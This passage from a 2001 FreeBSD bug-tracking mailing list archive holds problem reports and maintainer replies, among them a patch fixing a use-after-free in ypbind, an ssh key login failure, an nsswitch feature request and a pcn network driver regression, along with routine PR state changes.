Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27990 >Category: bin >Synopsis: ypbind uses memory after freeing it >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 09:30:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: >Release: FreeBSD 4.3-STABLE i386 >Organization: The FreeBSD Project >Environment: System: FreeBSD platinum.shef.vinosystems.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Sun May 20 14:21:28 BST 2001 ben@platinum.scientia.demon.co.uk:/usr/obj/usr/src/sys/PLATINUM i386 (Rather old, but I don't see any recent commits to this file.) >Description: Maybe I'm missing something but this code just looks plain Wrong to me: for(ypdb=ypbindlist; ypdb; ypdb=ypdb->dom_pnext) { if (READFD > 0 && FD_ISSET(READFD, &fdsr)) { handle_children(ypdb); if (children == (MAX_CHILDREN - 1)) checkwork(); } } Given this code in the handle_children() function: switch(ypdb->dom_default) { case 0: ... free(ypdb); << HERE domains--; return; After returning the main() function will do 'ypdb=ypdb->dom_pnext' after 'ypdb' has been freed. >How-To-Repeat: Not quite sure. I noticed it while I had one machine on my network using the old NIS domain after I'd changed the rest to a new one, maybe that's related. >Fix: This has fixed the problem for me on -stable, not sure if it applies to current too or not though. If someone can just review it I can commit it. --- ypbind.c.orig Sat Jun 9 17:03:47 2001 +++ ypbind.c Sat Jun 9 17:04:32 2001 @@ -394,7 +394,7 @@ int i; DIR *dird; struct dirent *dirp; - struct _dom_binding *ypdb; + struct _dom_binding *ypdb, *next; /* Check that another ypbind isn't already running. */ if ((yplockfd = (open(YPBINDLOCK, O_RDONLY|O_CREAT, 0444))) == -1) @@ -493,7 +493,8 @@ syslog(LOG_WARNING, "select: %m"); break; default: - for(ypdb=ypbindlist; ypdb; ypdb=ypdb->dom_pnext) { + for(ypdb=ypbindlist; ypdb; ypdb=next) { + next = ypdb->dom_pnext; if (READFD > 0 && FD_ISSET(READFD, &fdsr)) { handle_children(ypdb); if (children == (MAX_CHILDREN - 1)) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 11:20: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A135C37B403 for ; Sat, 9 Jun 2001 11:20:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59IK0311798; Sat, 9 Jun 2001 11:20:00 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BF58A37B401 for ; Sat, 9 Jun 2001 11:19:28 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59IJSL11760; Sat, 9 Jun 2001 11:19:28 -0700 (PDT) (envelope-from nobody) Message-Id: <200106091819.f59IJSL11760@freefall.freebsd.org> Date: Sat, 9 Jun 2001 11:19:28 -0700 (PDT) From: wevers@cg.nu To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/27991: ssh 1 and 2 login with keys is not possible anymore! Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27991 >Category: i386 >Synopsis: ssh 1 and 2 login with keys is not possible anymore! >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 11:20:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Henk Wevers >Release: >Organization: >Environment: FreeBSD cg.nu 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri Jun 8 21:54:05 CEST 2001 root@cg.nu:/usr/obj/usr/src/sys/BLAAT i386 >Description: If i try to login with ssh or ssh -2 i can NOT login with the keys inserted thru ssh-agent. if i try to login i do get the following message. Jun 9 20:17:45 f sshd[1623]: ROOT LOGIN as 'henk' from cg.nu Jun 9 20:17:45 f sshd[1623]: Accepted rsa for HENK from 10.10.1.1 port 1997 Jun 9 20:17:45 f sshd[1623]: fatal: PAM setcred failed[6]: Permission denied >How-To-Repeat: It does also work on a STABLE machine compiled today :(( >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 13:20: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 614A037B405 for ; Sat, 9 Jun 2001 13:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59KK2g29855; Sat, 9 Jun 2001 13:20:02 -0700 (PDT) (envelope-from gnats) Received: from szit.bme.hu (fourier.szit.bme.hu [152.66.84.8]) by hub.freebsd.org (Postfix) with SMTP id 7874C37B401 for ; Sat, 9 Jun 2001 13:12:19 -0700 (PDT) (envelope-from gyori@szit.bme.hu) Received: (qmail 77135 invoked by uid 8452); 9 Jun 2001 20:12:18 -0000 Message-Id: <20010609201218.77134.qmail@szit.bme.hu> Date: 9 Jun 2001 20:12:18 -0000 From: gyori@szit.bme.hu Reply-To: gyori@szit.bme.hu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/27994: Really functioning nsswitch in FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27994 >Category: bin >Synopsis: FreeBSD should have really functioning nsswitch >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 13:20:02 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Gyori Sandor >Release: FreeBSD 4.1.1-STABLE i386 >Organization: Technical University of Budapest >Environment: FreeBSD 4.x or -CURRENT >Description: FreeBSD 4.x has no support to nsswitch, and even the -CURRENT supports only very few, predefined methods such as files, nis, nisplus for user authentication in nsswitch.conf. Dynamical modules can't be used, for example nss_ldap for authentication via LDAP. There are patches to solve this problem at http://www.nectar.com/freebsd/nsswitch, but only a part of them was built in to -CURRENT (the statical part). Why?? This is a serious deficiency of FreeBSD which has been solved on Linux for ages. Is there any security or other reason not to implement a fully functional nsswitch feature on FreeBSD? >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 13:42:43 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CB0D037B401; Sat, 9 Jun 2001 13:42:41 -0700 (PDT) (envelope-from dougb@FreeBSD.org) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59KgfV31370; Sat, 9 Jun 2001 13:42:41 -0700 (PDT) (envelope-from dougb) Date: Sat, 9 Jun 2001 13:42:41 -0700 (PDT) From: Message-Id: <200106092042.f59KgfV31370@freefall.freebsd.org> To: gyori@szit.bme.hu, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/27994: FreeBSD should have really functioning nsswitch Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD should have really functioning nsswitch State-Changed-From-To: open->closed State-Changed-By: dougb State-Changed-When: Sat Jun 9 13:41:17 PDT 2001 State-Changed-Why: This is not the right forum for this discussion. The problems associated are more complicated than applying a few patches. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27994 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 13:50: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 99BD137B407 for ; Sat, 9 Jun 2001 13:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Ko1631731; Sat, 9 Jun 2001 13:50:01 -0700 (PDT) (envelope-from gnats) Received: from sep.hamburg.com (sep.hamburg.com [194.64.112.14]) by hub.freebsd.org (Postfix) with ESMTP id AB52B37B401 for ; Sat, 9 Jun 2001 13:44:22 -0700 (PDT) (envelope-from hmo@sep.hamburg.com) Received: (from hmo@localhost) by sep.hamburg.com (8.11.3/8.11.3/hmo03mar01) id f59KhuB01107; Sat, 9 Jun 2001 22:43:56 +0200 (CEST) (envelope-from hmo) Message-Id: <200106092043.f59KhuB01107@sep.hamburg.com> Date: Sat, 9 Jun 2001 22:43:56 +0200 (CEST) From: send-pr@oldach.net Reply-To: send-pr@oldach.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27995: cvs commit: src/sys/pci if_pcn.c revision 1.21 resp. 1.5.2.7 breaks pcn device on HP Vectra Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27995 >Category: kern >Synopsis: src/sys/pci if_pcn.c revision 1.21 resp. 1.5.2.7 breaks pcn device on HP Vectra >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 09 13:50:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Helge Oldach >Release: FreeBSD 4.3-STABLE i386 >Organization: >Environment: System: FreeBSD sep.hamburg.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Mon Jun 4 12:02:24 CEST 2001 toor@sep.hamburg.com:/usr/obj/usr/src/sys/HMO i386 Hewlett-Packard Vectra XA. This box has a built-in NIC with a "10" and a "100" connector. Copyright (c) 1992-2001 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.3-STABLE #0: Mon Jun 4 12:02:24 CEST 2001 toor@sep.hamburg.com:/usr/obj/usr/src/sys/HMO Timecounter "i8254" frequency 1193182 Hz CPU: Pentium/P55C (165.79-MHz 586-class CPU) Origin = "GenuineIntel" Id = 0x544 Stepping = 4 Features=0x8001bf real memory = 100659200 (98300K bytes) avail memory = 92856320 (90680K bytes) Preloaded elf kernel "kernel.old" at 0xc04f0000. Preloaded userconfig_script "/boot/kernel.conf" at 0xc04f00ac. Intel Pentium detected, installing workaround for F00F bug md0: Malloc disk apm0: on motherboard apm: found APM BIOS v1.2, connected at v1.2 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 ncr0: port 0xfc00-0xfcff mem 0xfedfbc00-0xfedfbcff irq 15 at device 6.0 on pci0 pci0: at 10.0 irq 11 pcn0: port 0xf8e0-0xf8ff mem 0xfedfb800-0xfedfb81f irq 15 at device 11.0 on pci0 pcn0: Ethernet address: 00:60:b0:7b:b6:3f miibus0: on pcn0 nsphy0: on miibus0 nsphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto .... >Description: The commits for these revisions properly turned on autonegotiation handling through miibus and disabled the PHY's autonegotiation. Unfortunately miibus autoneg handling doesn't work on this Vectra: During device probe the nsphy says "no media present" if *anything* is connected to either the 10 or the 100 port. Workaround: disconnect from the hub/switch during boot. This is probably kern/25959. Before the commit the PHY was doing autoneg. This led to the strange effect that a 10BaseT hub on the "100" Port worked fine (but not on the "10" port). After this commit miibus is responsible for autonegotiation. This doesn't work at all. The "10" port doesn't, and the "100" port doesn't either. While with the hub at the "10" port the link is down (which the hub doesn't grok, as it sees it link up), at the "100" port the link is up but no packets get transmitted. Seems that the MII autonegotiation stuff is broken. The pcn device is just unusable now. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 15:40:14 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2FDF437B401 for ; Sat, 9 Jun 2001 15:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Me3E46943; Sat, 9 Jun 2001 15:40:03 -0700 (PDT) (envelope-from gnats) Date: Sat, 9 Jun 2001 15:40:03 -0700 (PDT) Message-Id: <200106092240.f59Me3E46943@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Wemm Subject: Re: bin/27994: Really functioning nsswitch in FreeBSD Reply-To: Peter Wemm Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27994; it has been noted by GNATS. From: Peter Wemm To: gyori@szit.bme.hu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/27994: Really functioning nsswitch in FreeBSD Date: Sat, 09 Jun 2001 15:35:23 -0700 gyori@szit.bme.hu wrote: > >Description: > > FreeBSD 4.x has no support to nsswitch, and even the -CURRENT > supports only very few, predefined methods such as files, nis, nisplus for > user authentication in nsswitch.conf. Dynamical modules can't be used, for > example nss_ldap for authentication via LDAP. There are patches to solve > this problem at http://www.nectar.com/freebsd/nsswitch, but only a part of > them was built in to -CURRENT (the statical part). Why?? This is a serious > deficiency of FreeBSD which has been solved on Linux for ages. Is there any > security or other reason not to implement a fully functional nsswitch > feature on FreeBSD? The basic problem is that it requires *everything* to be dynamically linked, even the root filesystem (/bin, /sbin etc) and splitting the libraries between /lib and /usr/lib. Various people do not want this. There are other possibilities, such as using proxy nsswitch servers or something, but that will likely look quite different to normal nsswitch. Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:15:36 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1960A37B405; Sat, 9 Jun 2001 16:15:35 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NFZZ52305; Sat, 9 Jun 2001 16:15:35 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:15:35 -0700 (PDT) From: Message-Id: <200106092315.f59NFZZ52305@freefall.freebsd.org> To: adam@veda.is, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/4051: pppd connect 'chat ...' broken Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pppd connect 'chat ...' broken State-Changed-From-To: open->feedback State-Changed-By: dd State-Changed-When: Sat Jun 9 16:15:22 PDT 2001 State-Changed-Why: Is this still a problem with recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=4051 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:16:49 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04A4737B405; Sat, 9 Jun 2001 16:16:43 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NGhb52524; Sat, 9 Jun 2001 16:16:43 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:16:43 -0700 (PDT) From: Message-Id: <200106092316.f59NGhb52524@freefall.freebsd.org> To: toasty@home.dragondata.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/6623: non-root user can crash system if disconnected de card present Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: non-root user can crash system if disconnected de card present State-Changed-From-To: open->feedback State-Changed-By: dd State-Changed-When: Sat Jun 9 16:16:26 PDT 2001 State-Changed-Why: Is this still a problem with more recent releases? I can't reproduce it with -current here. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=6623 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:19:36 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B1B5737B401; Sat, 9 Jun 2001 16:19:34 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NJYD52866; Sat, 9 Jun 2001 16:19:34 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:19:34 -0700 (PDT) From: Message-Id: <200106092319.f59NJYD52866@freefall.freebsd.org> To: dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, rwatson@FreeBSD.org Subject: Re: kern/7837: patches to add a p_auth extension pointer to the proc structure Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: patches to add a p_auth extension pointer to the proc structure Responsible-Changed-From-To: freebsd-bugs->rwatson Responsible-Changed-By: dd Responsible-Changed-When: Sat Jun 9 16:19:20 PDT 2001 Responsible-Changed-Why: Over to originator, who can decide whether this is still desirable. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=7837 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:26:12 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 758D537B440; Sat, 9 Jun 2001 16:26:07 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NQ7H53275; Sat, 9 Jun 2001 16:26:07 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:26:07 -0700 (PDT) From: Message-Id: <200106092326.f59NQ7H53275@freefall.freebsd.org> To: shipley@dis.org, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/9791: enhancement for netinet/ip_icmp.c to control ping responses Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: enhancement for netinet/ip_icmp.c to control ping responses State-Changed-From-To: open->suspended State-Changed-By: dd State-Changed-When: Sat Jun 9 16:25:33 PDT 2001 State-Changed-Why: It's probably better to do this in ping(8) rather than the kernel. Regardless, this change should be discussed prior to being committed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9791 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:27:42 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 63AD937B401; Sat, 9 Jun 2001 16:27:39 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NRcD53428; Sat, 9 Jun 2001 16:27:38 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:27:38 -0700 (PDT) From: Message-Id: <200106092327.f59NRcD53428@freefall.freebsd.org> To: jarbo@infocentre.gva.es, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/10160: kldload of umap module panics the system Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kldload of umap module panics the system State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 16:27:23 PDT 2001 State-Changed-Why: Seems to be fixed in -current (although, as docuemnted, umapfs doesn't work). http://www.FreeBSD.org/cgi/query-pr.cgi?pr=10160 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:43: 2 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [216.240.45.60]) by hub.freebsd.org (Postfix) with ESMTP id 92AD037B405; Sat, 9 Jun 2001 16:43:00 -0700 (PDT) (envelope-from shipley@kizmiaz.dis.org) Received: from kizmiaz.dis.org (shipley@localhost [127.0.0.1]) by kizmiaz.dis.org (8.11.3/8.9.3) with ESMTP id f59NvZN29052; Sat, 9 Jun 2001 16:57:35 -0700 (PDT) (envelope-from shipley@kizmiaz.dis.org) Message-Id: <200106092357.f59NvZN29052@kizmiaz.dis.org> To: dd@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/9791: enhancement for netinet/ip_icmp.c to control ping responses From: Evil Pete X-Phone: (510) 849-2230 X-Snail-address: 2425 Channing Way; PMB# 587; Berkeley CA 94704-2209 In-reply-to: Your message of Sat, 09 Jun 2001 16:26:07 -0700. <200106092326.f59NQ7H53275@freefall.freebsd.org> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <29047.992131055.1@kizmiaz.dis.org> Date: Sat, 09 Jun 2001 16:57:35 -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ping 8 sends pings, this patch just changes the way the kernel responds to pings. While true this can be done in ipfw like the kernal options net.inet.icmp.bmcastecho and net.inet.tcp.drop_synfin I think the patch is cleaner/faster >Synopsis: enhancement for netinet/ip_icmp.c to control ping responses > >State-Changed-From-To: open->suspended >State-Changed-By: dd >State-Changed-When: Sat Jun 9 16:25:33 PDT 2001 >State-Changed-Why: >It's probably better to do this in ping(8) rather than the kernel. Regardless }, >this change should be discussed prior to being committed. > >http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9791 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:49:22 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from bazooka.unixfreak.org (bazooka.unixfreak.org [63.198.170.138]) by hub.freebsd.org (Postfix) with ESMTP id 7B1FA37B401 for ; Sat, 9 Jun 2001 16:49:16 -0700 (PDT) (envelope-from dima@unixfreak.org) Received: from hornet.unixfreak.org (hornet [63.198.170.140]) by bazooka.unixfreak.org (Postfix) with ESMTP id BDA3F3E0B; Sat, 9 Jun 2001 16:49:15 -0700 (PDT) To: Evil Pete Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/9791: enhancement for netinet/ip_icmp.c to control ping responses In-Reply-To: <200106092357.f59NvZN29052@kizmiaz.dis.org>; from shipley@dis.org on "Sat, 09 Jun 2001 16:57:35 -0700" Date: Sat, 09 Jun 2001 16:49:15 -0700 From: Dima Dorfman Message-Id: <20010609234915.BDA3F3E0B@bazooka.unixfreak.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Evil Pete writes: > ping 8 sends pings, this patch just changes the way the kernel > responds to pings. While true this can be done in ipfw like the > kernal options net.inet.icmp.bmcastecho and net.inet.tcp.drop_synfin > I think the patch is cleaner/faster Whoops, I should've read that more carefully. Even so, I think this should be brought up on -hackers or -net. And honestly, I don't see why ipfw isn't fast enough. > > >Synopsis: enhancement for netinet/ip_icmp.c to control ping responses > > > >State-Changed-From-To: open->suspended > >State-Changed-By: dd > >State-Changed-When: Sat Jun 9 16:25:33 PDT 2001 > >State-Changed-Why: > >It's probably better to do this in ping(8) rather than the kernel. Regardle > ss > }, > >this change should be discussed prior to being committed. > > > >http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9791 > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:50:57 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 861BB37B401; Sat, 9 Jun 2001 16:50:54 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NosM62102; Sat, 9 Jun 2001 16:50:54 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:50:54 -0700 (PDT) From: Message-Id: <200106092350.f59NosM62102@freefall.freebsd.org> To: rantapaa@uswest.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/10894: wrong error message in svctcp_create() Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: wrong error message in svctcp_create() State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 16:50:45 PDT 2001 State-Changed-Why: Committed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=10894 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:52:21 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C4D4637B403; Sat, 9 Jun 2001 16:52:18 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NqIo62285; Sat, 9 Jun 2001 16:52:18 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:52:18 -0700 (PDT) From: Message-Id: <200106092352.f59NqIo62285@freefall.freebsd.org> To: dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: kern/11789: ELF machine definition missing for ARM Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ELF machine definition missing for ARM Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: dd Responsible-Changed-When: Sat Jun 9 16:52:01 PDT 2001 Responsible-Changed-Why: David seems to do most of the commits to this file. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11789 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:53:46 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BF22037B403; Sat, 9 Jun 2001 16:53:40 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Nrdr62427; Sat, 9 Jun 2001 16:53:39 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:53:39 -0700 (PDT) From: Message-Id: <200106092353.f59Nrdr62427@freefall.freebsd.org> To: als@fl.net.au, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/11941: FreeBSD box reboots itself when changing screens at the console Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD box reboots itself when changing screens at the console State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 